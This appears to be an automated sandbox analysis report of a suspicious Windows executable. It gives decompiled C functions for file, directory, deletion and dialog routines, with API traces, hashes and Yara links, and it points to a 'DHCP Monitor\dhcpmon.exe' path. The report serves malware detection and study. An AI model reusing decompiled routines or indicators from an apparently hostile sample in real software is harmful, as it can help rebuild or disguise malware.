Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dea
0x00405df7
0x00405e0c
0x00405e12

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405DEA
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00405dc6
0x00405dcc
0x00405dd1
0x00405dda
0x00405dda
0x00405de3

APIs

GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405DDA

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004058bd
0x004058c5
0x00000000
0x004058cb
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e62
0x00405e72
0x00405e7a
0x00000000
0x00405e81
0x00000000
0x00405e83

APIs

ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e91
0x00405ea1
0x00405ea9
0x00000000
0x00405eb0
0x00000000
0x00405eb2

APIs

WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041A964,00415460,004033BF,00415460,0041A964,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4

Uniqueness

Uniqueness Score: -1.00%

Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040344c
0x00403452

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C10, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C10(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x00405c10
0x00405c23
0x00405c23
0x00405c27
0x00000000
0x00000000
0x00405c1a
0x00405c1d
0x00000000
0x00405c1d
0x00000000
0x00405c1a
0x00405c29

APIs

CharNextA.USER32(?,00403593,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000020,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000000,?,00000007,00000009,0000000B), ref: 00405C1D

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction ID: a823865110b2f25737836ca410d0586f0b32f660d12bad0ae163707f0ebdfa97
Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
Instruction Fuzzy Hash: 2FC0807440CF8057E510571051244677FE0EAD2700F248C5AF0C063150C13858C08B29

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

APIs

DeleteFileA.KERNEL32(?,?,7519FA90,7519F560,00000000), ref: 00405A3E
lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405A86
lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405AA7
lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405AAD
FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405ABE
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
FindClose.KERNEL32(00000000), ref: 00405B7C

Strings

"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00405A15
\*.*, xrefs: 00405A80

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$\*.*
API String ID: 2035342205-4194548641
Opcode ID: cc75949f2c5ed0dd18fec942dd6501626af4dc272a4f1900502067ab13e55c41
Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
Opcode Fuzzy Hash: cc75949f2c5ed0dd18fec942dd6501626af4dc272a4f1900502067ab13e55c41
Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD6, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x77ec4e
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
